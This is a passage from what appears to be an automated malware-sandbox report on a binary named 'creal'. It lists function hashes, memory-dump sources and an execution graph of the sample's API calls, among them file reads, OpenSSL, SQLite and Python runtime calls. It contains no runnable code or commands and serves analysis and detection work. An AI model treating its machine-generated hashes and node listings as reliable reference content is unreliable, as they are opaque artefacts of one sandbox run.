                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB2144B3638A8191E620DB10E4516EBA364FF98B84F805175E68D87AB5DF3CD245DB00
                                                                                                                                                                                                                Function 00007FF67A60FF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                • Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                                                                                                • Instruction ID: caeaadf2e392ea10408a2ef1163c673c73c51142cff6921426f47ddd0d3ebf9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2112B33628B4182EB618F25E44066BB7E5FB88F84F584274EE8C87768EF3CD5518B00
                                                                                                                                                                                                                Function 00007FF67A62051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                • Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                                                                                                • Instruction ID: 428145653e9ec295a7b4c9f8cd23ae8f33a0613b6cfffb0c3415591e4b60370f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25018F6793820386FB20EF64946127F6BA0EF48B08F814075D64DC66F5DF2CE944EA14

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:9.8%
                                                                                                                                                                                                                Total number of Nodes:1222
                                                                                                                                                                                                                Total number of Limit Nodes:147
                                                                                                                                                                                                                execution_graph 101010 7ff8e68c1490 GetSystemInfo 101011 7ff8e68c14c4 101010->101011 101012 7ff8e68d1630 101013 7ff8e68d167c 101012->101013 101014 7ff8e68d168e strcmp 101013->101014 101018 7ff8e68d16a1 new[] 101013->101018 101014->101018 101019 7ff8e68d17ea memcpy 101018->101019 101022 7ff8e68d17b2 101018->101022 101024 7ff8e68d17f5 new[] 101018->101024 101019->101024 101021 7ff8e68d1a61 101023 7ff8e68d1ae2 101021->101023 101041 7ff8e68bdc50 101021->101041 101054 7ff8e69dabc0 101022->101054 101023->101022 101063 7ff8e68c87b0 101023->101063 101024->101022 101024->101023 101026 7ff8e68c9060 101024->101026 101027 7ff8e68c90f1 101026->101027 101037 7ff8e68c9244 new[] 101026->101037 101031 7ff8e68c910a new[] 101027->101031 101027->101037 101028 7ff8e68c9147 new[] 101029 7ff8e68c91a2 memset 101028->101029 101039 7ff8e68c9383 101028->101039 101030 7ff8e68c920c memcpy 101029->101030 101036 7ff8e68c9441 101029->101036 101032 7ff8e68c93ec 101030->101032 101033 7ff8e68c922e memcpy 101030->101033 101035 7ff8e68c9131 memcpy 101031->101035 101031->101039 101034 7ff8e68c93ef memcpy memcpy 101032->101034 101033->101034 101034->101036 101035->101028 101036->101039 101076 7ff8e68c0250 101036->101076 101037->101028 101037->101037 101037->101039 101090 7ff8e69725d0 13 API calls 101037->101090 101039->101021 101042 7ff8e68bdc7d 101041->101042 101050 7ff8e68bdccb 101041->101050 101044 7ff8e68bdcb4 memcpy 101042->101044 101045 7ff8e68bdc94 memcpy 101042->101045 101043 7ff8e68bdcf4 ReadFile 101046 7ff8e68bdd8a 101043->101046 101043->101050 101044->101050 101047 7ff8e68bdc99 101045->101047 101048 7ff8e68bddba 101046->101048 101101 7ff8e68b94b0 13 API calls 101046->101101 101047->101023 101048->101047 101051 7ff8e68bddc9 memset 101048->101051 101050->101043 101050->101046 101052 7ff8e68bdd64 101050->101052 101051->101047 101100 7ff8e68bda80 18 API calls 101052->101100 101055 7ff8e69dabc9 101054->101055 101056 7ff8e68d17cf 101055->101056 101057 7ff8e69dac14 IsProcessorFeaturePresent 101055->101057 101058 7ff8e69dac2c 101057->101058 101102 7ff8e69dae08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 101058->101102 101060 7ff8e69dac3f 101103 7ff8e69dabe0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 101060->101103 101065 7ff8e68c87e3 101063->101065 101104 7ff8e68cd460 101065->101104 101066 7ff8e68c88ac 101066->101066 101110 7ff8e68c40e0 101066->101110 101068 7ff8e68c8988 101114 7ff8e68c6a40 101068->101114 101070 7ff8e68c8972 101118 7ff8e68caf90 35 API calls 101070->101118 101071 7ff8e68c8998 101071->101068 101119 7ff8e68c6ca0 memset memset 101071->101119 101075 7ff8e68c89b3 101075->101022 101086 7ff8e68c02a1 101076->101086 101079 7ff8e69dabc0 8 API calls 101080 7ff8e68c08c7 101079->101080 101080->101039 101081 7ff8e68c0470 CreateFileW 101081->101086 101084 7ff8e68c06f5 101098 7ff8e68bda80 18 API calls 101084->101098 101086->101081 101086->101084 101087 7ff8e68c0628 101086->101087 101091 7ff8e68bd2c0 101086->101091 101095 7ff8e68bfc70 22 API calls new[] 101086->101095 101096 7ff8e68c0aa0 19 API calls 101086->101096 101097 7ff8e68b94b0 13 API calls 101086->101097 101087->101079 101088 7ff8e68c0720 101099 7ff8e69725d0 13 API calls 101088->101099 101090->101028 101092 7ff8e68bd2fe new[] 101091->101092 101093 7ff8e68bd31b memset 101092->101093 101094 7ff8e68bd347 101092->101094 101093->101094 101094->101086 101095->101086 101096->101086 101097->101086 101098->101088 101099->101087 101100->101047 101101->101048 101102->101060 101105 7ff8e68cd541 101104->101105 101106 7ff8e68cd48f 101104->101106 101105->101066 101106->101105 101120 7ff8e68cf040 26 API calls 101106->101120 101108 7ff8e68cd4fc 101108->101105 101121 7ff8e68cd3d0 13 API calls 101108->101121 101111 7ff8e68c41e1 101110->101111 101112 7ff8e68c40fc 101110->101112 101111->101068 101111->101070 101111->101071 101112->101111 101113 7ff8e68c41ce memset 101112->101113 101113->101111 101115 7ff8e68c6a56 101114->101115 101116 7ff8e68c6b3e 101115->101116 101117 7ff8e68c40e0 memset 101115->101117 101116->101075 101117->101116 101118->101068 101119->101068 101120->101108 101121->101105 101122 7ff8e71f7a00 101123 7ff8e71f7a15 101122->101123 101124 7ff8e71f7a51 101123->101124 101125 7ff8e71f7a2c ERR_set_mark OBJ_nid2sn EVP_CIPHER_fetch ERR_pop_to_mark 101123->101125 101125->101124 101126 7ff8e71effe0 101127 7ff8e71efff0 101126->101127 101128 7ff8e71f0000 ERR_new ERR_set_debug ERR_set_error 101127->101128 101129 7ff8e71f003b 101127->101129 101130 7ff8e71f00b7 101129->101130 101131 7ff8e71f0075 ASYNC_get_current_job 101129->101131 101132 7ff8e71f00bd 101129->101132 101136 7ff8e71d14bf 101130->101136 101166 7ff8e71d1e01 101130->101166 101131->101130 101133 7ff8e71f007f 101131->101133 101136->101132 101137 7ff8e722e560 101136->101137 101138 7ff8e722f0d3 101137->101138 101139 7ff8e722ed9a ERR_clear_error SetLastError 101137->101139 101138->101132 101140 7ff8e722edb3 101139->101140 101140->101138 101141 7ff8e722ee68 101140->101141 101142 7ff8e722eeb5 101140->101142 101157 7ff8e722edfe 101140->101157 101143 7ff8e722eecd 101141->101143 101146 7ff8e722ee80 ERR_new 101141->101146 101142->101143 101144 7ff8e722eec1 ERR_new 101142->101144 101154 7ff8e722eee5 ERR_new 101143->101154 101158 7ff8e722eef1 101143->101158 101148 7ff8e722ee8a ERR_set_debug 101144->101148 101146->101148 101147 7ff8e722f055 101150 7ff8e722f060 ERR_new ERR_set_debug 101147->101150 101151 7ff8e722f092 ERR_new ERR_set_debug ERR_set_error 101147->101151 101153 7ff8e722eeb0 101148->101153 101152 7ff8e71d1d93 101150->101152 101151->101153 101152->101151 101156 7ff8e722f0c3 BUF_MEM_free 101153->101156 101154->101148 101155 7ff8e722ef37 101161 7ff8e722ef4a ERR_new 101155->101161 101162 7ff8e722ef7f 101155->101162 101156->101138 101157->101147 101157->101153 101157->101156 101196 7ff8e722e8a0 101157->101196 101210 7ff8e722f2d0 101157->101210 101158->101155 101159 7ff8e722ef16 101158->101159 101160 7ff8e722ef07 ERR_new 101158->101160 101159->101155 101165 7ff8e722ef28 ERR_new 101159->101165 101160->101148 101163 7ff8e722ef54 ERR_set_debug 101161->101163 101162->101157 101164 7ff8e722ef99 ERR_new 101162->101164 101163->101153 101164->101163 101165->101148 101166->101132 101167 7ff8e722e680 101166->101167 101168 7ff8e722ed9a ERR_clear_error SetLastError 101167->101168 101187 7ff8e722f0d3 101167->101187 101170 7ff8e722edb3 101168->101170 101169 7ff8e722edfe 101175 7ff8e722e8a0 36 API calls 101169->101175 101177 7ff8e722f055 101169->101177 101179 7ff8e722f2d0 31 API calls 101169->101179 101180 7ff8e722eeb0 101169->101180 101186 7ff8e722f0c3 BUF_MEM_free 101169->101186 101170->101169 101171 7ff8e722ee68 101170->101171 101172 7ff8e722eeb5 101170->101172 101170->101187 101173 7ff8e722eecd 101171->101173 101176 7ff8e722ee80 ERR_new 101171->101176 101172->101173 101174 7ff8e722eec1 ERR_new 101172->101174 101184 7ff8e722eee5 ERR_new 101173->101184 101188 7ff8e722eef1 101173->101188 101178 7ff8e722ee8a ERR_set_debug 101174->101178 101175->101169 101176->101178 101181 7ff8e722f060 ERR_new ERR_set_debug 101177->101181 101182 7ff8e722f092 ERR_new ERR_set_debug ERR_set_error 101177->101182 101178->101180 101179->101169 101180->101186 101183 7ff8e71d1d93 101181->101183 101182->101180 101183->101182 101184->101178 101185 7ff8e722ef37 101191 7ff8e722ef4a ERR_new 101185->101191 101192 7ff8e722ef7f 101185->101192 101186->101187 101187->101132 101188->101185 101189 7ff8e722ef16 101188->101189 101190 7ff8e722ef07 ERR_new 101188->101190 101189->101185 101195 7ff8e722ef28 ERR_new 101189->101195 101190->101178 101193 7ff8e722ef54 ERR_set_debug 101191->101193 101192->101169 101194 7ff8e722ef99 ERR_new 101192->101194 101193->101180 101194->101193 101195->101178 101201 7ff8e722e8ba 101196->101201 101197 7ff8e722eb60 ERR_new 101198 7ff8e722eb6a ERR_set_debug 101197->101198 101204 7ff8e722ebb7 101198->101204 101200 7ff8e722ebf1 ERR_new 101200->101198 101201->101197 101201->101200 101202 7ff8e722ebd6 101201->101202 101201->101204 101206 7ff8e722ec00 ERR_new ERR_set_debug 101201->101206 101207 7ff8e722ea1e BUF_MEM_grow_clean 101201->101207 101208 7ff8e722eb8d ERR_new ERR_set_debug 101201->101208 101226 7ff8e71d13d9 101201->101226 101250 7ff8e71d11cc memcmp 101201->101250 101203 7ff8e722ebe2 ERR_new 101202->101203 101202->101204 101205 7ff8e722eb2d ERR_set_debug 101203->101205 101204->101157 101205->101204 101206->101204 101207->101201 101207->101208 101208->101204 101219 7ff8e722f2ec 101210->101219 101211 7ff8e722f382 ERR_new ERR_set_debug 101214 7ff8e722f5b1 101211->101214 101212 7ff8e722f665 101213 7ff8e722f671 ERR_new 101212->101213 101212->101214 101215 7ff8e722f67b ERR_set_debug 101213->101215 101214->101157 101215->101214 101217 7ff8e722f64c 101218 7ff8e722f656 ERR_new 101217->101218 101218->101212 101219->101211 101219->101212 101219->101214 101219->101217 101220 7ff8e722f633 101219->101220 101222 7ff8e722f5ea 101219->101222 101251 7ff8e723e380 101219->101251 101255 7ff8e7230f12 101219->101255 101259 7ff8e71d138e CRYPTO_zalloc ERR_new ERR_set_debug ERR_set_error 101219->101259 101221 7ff8e722f63d ERR_new 101220->101221 101221->101217 101222->101214 101223 7ff8e722f604 ERR_new 101222->101223 101223->101215 101226->101201 101227 7ff8e7238110 101226->101227 101228 7ff8e7238126 OPENSSL_sk_new_null 101227->101228 101229 7ff8e7238152 ERR_new ERR_set_debug 101228->101229 101232 7ff8e723817f 101228->101232 101230 7ff8e723854e 101229->101230 101233 7ff8e723855e X509_free OPENSSL_sk_pop_free 101230->101233 101231 7ff8e723852b ERR_new ERR_set_debug 101231->101230 101232->101231 101248 7ff8e723820a 101232->101248 101245 7ff8e7238406 101233->101245 101234 7ff8e723851c ERR_new 101235 7ff8e723846f ERR_set_debug 101234->101235 101235->101230 101236 7ff8e7238247 X509_new_ex 101237 7ff8e72384ba ERR_new ERR_set_debug 101236->101237 101238 7ff8e7238283 d2i_X509 101236->101238 101240 7ff8e71d1d93 101237->101240 101239 7ff8e723848d ERR_new ERR_set_debug 101238->101239 101238->101248 101239->101230 101242 7ff8e72384ec ERR_new ERR_set_debug ERR_set_error 101240->101242 101241 7ff8e7238465 ERR_new 101241->101235 101242->101233 101243 7ff8e72383cf OPENSSL_sk_push 101244 7ff8e7238456 ERR_new 101243->101244 101243->101248 101244->101241 101245->101201 101246 7ff8e723842e ERR_new ERR_set_debug 101246->101230 101247 7ff8e723840f CRYPTO_free 101247->101233 101248->101234 101248->101236 101248->101241 101248->101243 101248->101245 101248->101246 101248->101247 101249 7ff8e72383b5 CRYPTO_free 101248->101249 101249->101243 101250->101201 101252 7ff8e723e390 101251->101252 101260 7ff8e71d24b9 101252->101260 101254 7ff8e723e3c9 101254->101219 101256 7ff8e7230f1a 101255->101256 101258 7ff8e7230d31 101256->101258 101279 7ff8e71d1956 7 API calls 101256->101279 101258->101219 101259->101219 101260->101254 101261 7ff8e7218170 101260->101261 101262 7ff8e72181f6 ERR_new ERR_set_debug 101261->101262 101265 7ff8e7218232 101261->101265 101263 7ff8e7218228 101262->101263 101263->101254 101264 7ff8e7218849 ERR_new 101265->101263 101268 7ff8e721836b EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_flags 101265->101268 101272 7ff8e721860f 101265->101272 101276 7ff8e72186ff 101265->101276 101266 7ff8e72186db 101269 7ff8e72186ec EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_flags 101266->101269 101266->101276 101267 7ff8e7218645 ERR_new ERR_set_debug 101267->101263 101270 7ff8e7218389 101268->101270 101268->101272 101269->101276 101271 7ff8e72183ce EVP_CIPHER_CTX_ctrl 101270->101271 101274 7ff8e72183ae 101270->101274 101271->101274 101272->101263 101272->101266 101272->101267 101273 7ff8e7218450 EVP_CIPHER_CTX_ctrl 101273->101272 101273->101274 101274->101263 101274->101272 101274->101273 101275 7ff8e72184e6 EVP_CIPHER_CTX_ctrl 101274->101275 101274->101276 101277 7ff8e72185e1 101274->101277 101275->101263 101275->101274 101276->101264 101277->101263 101278 7ff8e72185ee BIO_test_flags 101277->101278 101278->101263 101279->101258 101280 7ff8e7006080 101281 7ff8e70060ca PyType_GetModuleByDef PyModule_GetState 101280->101281 101286 7ff8e7006131 101280->101286 101282 7ff8e7006137 _PyArg_UnpackKeywords 101281->101282 101283 7ff8e700611e 101281->101283 101284 7ff8e70061bb 101282->101284 101282->101286 101283->101282 101283->101286 101347 7ff8e700b550 8 API calls 2 library calls 101284->101347 101287 7ff8e7006187 101286->101287 101291 7ff8e70062be PyFloat_AsDouble 101286->101291 101301 7ff8e7006208 101286->101301 101287->101284 101309 7ff8e7006350 PySys_Audit 101287->101309 101288 7ff8e70061d7 101289 7ff8e7006211 101289->101287 101293 7ff8e7006224 101289->101293 101348 7ff8e7006740 PyUnicode_AsUTF8AndSize PyErr_SetString PyErr_SetString sqlite3_stricmp PyErr_SetString 101289->101348 101290 7ff8e700628d _PyLong_AsInt 101290->101289 101294 7ff8e700d266 PyErr_Occurred 101290->101294 101295 7ff8e70062d1 101291->101295 101291->101301 101293->101284 101293->101287 101296 7ff8e700623b 101293->101296 101297 7ff8e700630a PyObject_IsTrue 101293->101297 101294->101284 101299 7ff8e700d275 101294->101299 101300 7ff8e700d252 PyErr_Occurred 101295->101300 101295->101301 101296->101287 101303 7ff8e700632d _PyLong_AsInt 101296->101303 101307 7ff8e7006253 101296->101307 101297->101284 101297->101296 101302 7ff8e700d27a PyErr_Occurred 101299->101302 101300->101284 101300->101301 101301->101287 101301->101289 101301->101290 101302->101284 101305 7ff8e700d289 101302->101305 101303->101302 101303->101307 101304 7ff8e70062f1 PyObject_IsTrue 101304->101284 101306 7ff8e7006260 101304->101306 101305->101305 101306->101287 101349 7ff8e7006870 PyLong_AsLong PyErr_SetString 101306->101349 101307->101287 101307->101304 101307->101306 101310 7ff8e7006645 101309->101310 101311 7ff8e700639e PyUnicode_FSConverter 101309->101311 101310->101284 101311->101310 101312 7ff8e70063b4 101311->101312 101313 7ff8e70063c1 PyEval_SaveThread sqlite3_open_v2 101312->101313 101352 7ff8e7004290 101312->101352 101314 7ff8e7006401 sqlite3_busy_timeout 101313->101314 101315 7ff8e700641b PyEval_RestoreThread 101313->101315 101314->101315 101316 7ff8e700642e 101315->101316 101317 7ff8e700643a 101315->101317 101316->101317 101318 7ff8e7006434 _Py_Dealloc 101316->101318 101319 7ff8e7006448 PyType_GetModuleByDef PyModule_GetState 101317->101319 101321 7ff8e700d297 PyErr_NoMemory 101317->101321 101318->101317 101322 7ff8e7006686 101319->101322 101323 7ff8e700646d PyLong_FromLong 101319->101323 101321->101310 101351 7ff8e70058d0 17 API calls 101322->101351 101325 7ff8e7006696 sqlite3_close 101323->101325 101326 7ff8e700648d PyObject_Vectorcall 101323->101326 101324 7ff8e70066c4 101324->101310 101324->101313 101325->101310 101328 7ff8e70064bd 101326->101328 101329 7ff8e700d2a3 101326->101329 101328->101325 101331 7ff8e70064c6 PyObject_Vectorcall 101328->101331 101329->101328 101330 7ff8e700d2ad _Py_Dealloc 101329->101330 101330->101328 101332 7ff8e70064e7 101331->101332 101333 7ff8e70064f6 101331->101333 101332->101333 101334 7ff8e70064ed _Py_Dealloc 101332->101334 101333->101325 101335 7ff8e70064ff PyList_New 101333->101335 101334->101333 101336 7ff8e7006513 PyList_New 101335->101336 101344 7ff8e700d2b9 101335->101344 101337 7ff8e7006527 PyThread_get_thread_ident 101336->101337 101338 7ff8e700d2db 101336->101338 101339 7ff8e700d307 101337->101339 101340 7ff8e7006588 101337->101340 101342 7ff8e700d2e6 _Py_Dealloc 101338->101342 101338->101344 101340->101339 101343 7ff8e700659e PySys_Audit 101340->101343 101341 7ff8e700d2cf _Py_Dealloc 101341->101325 101342->101344 101343->101310 101345 7ff8e7006639 101343->101345 101344->101325 101344->101341 101345->101310 101350 7ff8e7003ff0 22 API calls 101345->101350 101347->101288 101348->101293 101349->101287 101350->101310 101351->101325 101353 7ff8e70042a6 101352->101353 101354 7ff8e700435f 101352->101354 101355 7ff8e70042c6 PyEval_SaveThread sqlite3_close_v2 PyEval_RestoreThread 101353->101355 101356 7ff8e7004339 sqlite3_get_autocommit 101353->101356 101354->101324 101357 7ff8e7004332 101355->101357 101358 7ff8e7004300 101355->101358 101356->101355 101359 7ff8e7004343 101356->101359 101367 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101357->101367 101360 7ff8e700430d 101358->101360 101369 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101358->101369 101368 7ff8e7003ff0 22 API calls 101359->101368 101366 7ff8e7004325 101360->101366 101370 7ff8e70025b0 _Py_Dealloc PyMem_Free _Py_Dealloc 101360->101370 101365 7ff8e7004352 101365->101355 101366->101324 101368->101365 101371 7ff8e71f9060 101372 7ff8e71f907a 101371->101372 101373 7ff8e71f9090 ERR_new ERR_set_debug ERR_set_error 101372->101373 101374 7ff8e71f90c8 101372->101374 101380 7ff8e71f9177 101373->101380 101375 7ff8e71f90ce ERR_new ERR_set_debug ERR_set_error 101374->101375 101376 7ff8e71f910d 101374->101376 101375->101380 101377 7ff8e71f9122 ERR_new ERR_set_debug ERR_set_error 101376->101377 101378 7ff8e71f9154 101376->101378 101377->101380 101379 7ff8e71f916d ASYNC_get_current_job 101378->101379 101378->101380 101379->101380 101381 7ff8e7005b60 101382 7ff8e7005b7f PyThread_get_thread_ident 101381->101382 101383 7ff8e7005b8e 101381->101383 101382->101383 101384 7ff8e700d200 PyThread_get_thread_ident PyErr_Format 101382->101384 101385 7ff8e700d227 PyType_GetModuleByDef PyModule_GetState 101383->101385 101386 7ff8e7005b98 101383->101386 101387 7ff8e7005d40 101384->101387 101388 7ff8e7005ba3 101386->101388 101389 7ff8e7005f41 PyErr_SetString 101386->101389 101390 7ff8e7005e81 _PyArg_NoKeywords 101388->101390 101391 7ff8e7005bac _PyArg_ParseTuple_SizeT 101388->101391 101389->101384 101390->101387 101390->101391 101391->101387 101392 7ff8e7005bc9 PyUnicode_AsUTF8AndSize 101391->101392 101392->101387 101393 7ff8e7005be9 sqlite3_limit 101392->101393 101394 7ff8e7005ee4 PyErr_SetString 101393->101394 101395 7ff8e7005c14 101393->101395 101394->101387 101396 7ff8e7005c26 PyEval_SaveThread sqlite3_prepare_v2 PyEval_RestoreThread 101395->101396 101397 7ff8e7005e68 PyErr_SetString 101395->101397 101398 7ff8e7005d90 101396->101398 101399 7ff8e7005c68 101396->101399 101397->101387 101413 7ff8e70058d0 17 API calls 101398->101413 101400 7ff8e7005da0 101399->101400 101401 7ff8e7005c7f 101399->101401 101404 7ff8e7005e0a PyErr_SetString 101400->101404 101405 7ff8e7005db3 101400->101405 101403 7ff8e7005d0c _PyObject_GC_New 101401->101403 101406 7ff8e7005c98 _strnicmp 101401->101406 101409 7ff8e7005d5d 101401->101409 101407 7ff8e7005d25 PyObject_GC_Track 101403->101407 101408 7ff8e7005e1e sqlite3_finalize 101403->101408 101404->101408 101406->101409 101410 7ff8e7005cb6 _strnicmp 101406->101410 101407->101387 101408->101387 101409->101403 101410->101409 101411 7ff8e7005cd4 _strnicmp 101410->101411 101411->101409 101412 7ff8e7005cf2 _strnicmp 101411->101412 101412->101403 101412->101409 101413->101387 101414 7ff8e7218e50 101415 7ff8e7218e74 101414->101415 101416 7ff8e7218ecf CRYPTO_malloc 101415->101416 101419 7ff8e7218f04 101415->101419 101417 7ff8e7218ef3 ERR_new ERR_set_debug 101416->101417 101416->101419 101422 7ff8e7218fdb 101417->101422 101420 7ff8e7218f86 CRYPTO_free 101419->101420 101421 7ff8e7218fa1 CRYPTO_malloc 101419->101421 101419->101422 101420->101421 101421->101417 101421->101419 101423 7ff8e7152580 101424 7ff8e7152595 101423->101424 101425 7ff8e7152586 101423->101425 101431 7ff8e71439d0 101424->101431 101425->101424 101426 7ff8e715258c _Py_Dealloc 101425->101426 101426->101424 101430 7ff8e715382e 101432 7ff8e71439f6 101431->101432 101433 7ff8e7143b8b PyUnicode_FromString 101432->101433 101485 7ff8e7141060 12 API calls 101432->101485 101434 7ff8e7143d0c 101433->101434 101435 7ff8e7143ba5 PyType_GenericAlloc 101433->101435 101439 7ff8e7143d25 101434->101439 101441 7ff8e7143d1c _Py_Dealloc 101434->101441 101435->101434 101437 7ff8e7143bc0 101435->101437 101445 7ff8e7143c49 PyType_Ready 101437->101445 101446 7ff8e7143c2e PyObject_SetAttrString 101437->101446 101438 7ff8e7143a28 _PyType_CalculateMetaclass 101438->101434 101442 7ff8e7143a51 101438->101442 101444 7ff8e7143d36 _Py_Dealloc 101439->101444 101482 7ff8e7143d3f 101439->101482 101441->101439 101442->101433 101443 7ff8e7143a5e PyObject_GetAttrString 101442->101443 101447 7ff8e7143a81 PyUnicode_CompareWithASCIIString 101443->101447 101448 7ff8e7143a76 PyErr_Clear 101443->101448 101444->101482 101449 7ff8e7143cf8 101445->101449 101454 7ff8e7143c94 PyObject_GetAttrString 101445->101454 101446->101445 101446->101449 101451 7ff8e7143ada PyUnicode_CompareWithASCIIString 101447->101451 101452 7ff8e7143a98 strcmp 101447->101452 101453 7ff8e7143b6f PyErr_SetString 101448->101453 101449->101434 101459 7ff8e7143d03 _Py_Dealloc 101449->101459 101457 7ff8e7143aee 101451->101457 101458 7ff8e7143b07 PyUnicode_CompareWithASCIIString 101451->101458 101455 7ff8e7143aaf strcmp 101452->101455 101456 7ff8e7143ad5 101452->101456 101453->101434 101463 7ff8e7143cbf PyObject_IsTrue 101454->101463 101464 7ff8e7143d62 PyErr_Clear 101454->101464 101455->101456 101461 7ff8e7143ac2 strcmp 101455->101461 101462 7ff8e7143b6a 101456->101462 101465 7ff8e7143b61 _Py_Dealloc 101456->101465 101457->101456 101457->101458 101458->101456 101459->101434 101461->101451 101461->101456 101462->101433 101462->101453 101466 7ff8e7143cce 101463->101466 101467 7ff8e7143cdd 101463->101467 101468 7ff8e7143d68 PyObject_SetAttrString 101464->101468 101465->101462 101466->101467 101469 7ff8e7143cd4 _Py_Dealloc 101466->101469 101470 7ff8e7143d5e 101467->101470 101471 7ff8e7143ce1 PyErr_SetString 101467->101471 101468->101449 101472 7ff8e7143d85 _PyObject_FastCall 101468->101472 101469->101467 101470->101449 101470->101468 101471->101449 101472->101449 101473 7ff8e7143db3 _PyObject_GetAttrId 101472->101473 101474 7ff8e7143dca 101473->101474 101475 7ff8e7143dd9 101473->101475 101474->101475 101477 7ff8e7143dd0 _Py_Dealloc 101474->101477 101475->101449 101476 7ff8e7143de2 PyObject_VectorcallDict 101475->101476 101478 7ff8e7143e0b 101476->101478 101479 7ff8e7143dfb 101476->101479 101477->101475 101478->101449 101481 7ff8e7143e14 101478->101481 101479->101478 101480 7ff8e7143e02 _Py_Dealloc 101479->101480 101480->101478 101481->101482 101483 7ff8e7143e1e _Py_Dealloc 101481->101483 101484 7ff8e7143880 10 API calls 101482->101484 101483->101482 101484->101430 101485->101438 101486 7ff8e68ed329 101487 7ff8e68ed338 101486->101487 101489 7ff8e68f0d4e 101487->101489 101505 7ff8e68ed411 101487->101505 101510 7ff8e68d2f20 101487->101510 101493 7ff8e68f0dda 101489->101493 101502 7ff8e68f0e6a 101489->101502 101519 7ff8e68b94b0 13 API calls 101489->101519 101491 7ff8e68f1376 101521 7ff8e68b94b0 13 API calls 101491->101521 101492 7ff8e68f0f17 101517 7ff8e68b6c20 14 API calls new[] 101492->101517 101493->101491 101520 7ff8e68e0f90 13 API calls 101493->101520 101495 7ff8e68f13c8 101500 7ff8e68f13da 101495->101500 101522 7ff8e68e45a0 66 API calls 101495->101522 101496 7ff8e68ed374 101496->101489 101496->101505 101516 7ff8e68d4230 memset memset 101496->101516 101499 7ff8e68ead10 101504 7ff8e68f13eb 101500->101504 101523 7ff8e68b6db0 13 API calls 101500->101523 101501 7ff8e68f0f3a 101501->101502 101518 7ff8e690fb70 10 API calls 101501->101518 101504->101502 101524 7ff8e690fb70 10 API calls 101504->101524 101505->101489 101505->101492 101505->101499 101511 7ff8e68cb080 101510->101511 101512 7ff8e68cb0c7 memset 101511->101512 101513 7ff8e68cb19c 101511->101513 101512->101513 101514 7ff8e68cb0f2 new[] 101512->101514 101513->101496 101514->101513 101515 7ff8e68cb13f memset 101514->101515 101515->101514 101516->101505 101517->101501 101518->101502 101519->101493 101520->101491 101521->101495 101522->101500 101523->101504 101524->101502 101525 7ff8e7007c38 sqlite3_libversion_number 101526 7ff8e7007c56 sqlite3_initialize 101525->101526 101527 7ff8e700d860 101525->101527 101529 7ff8e700d869 sqlite3_errstr 101526->101529 101530 7ff8e7007c64 101526->101530 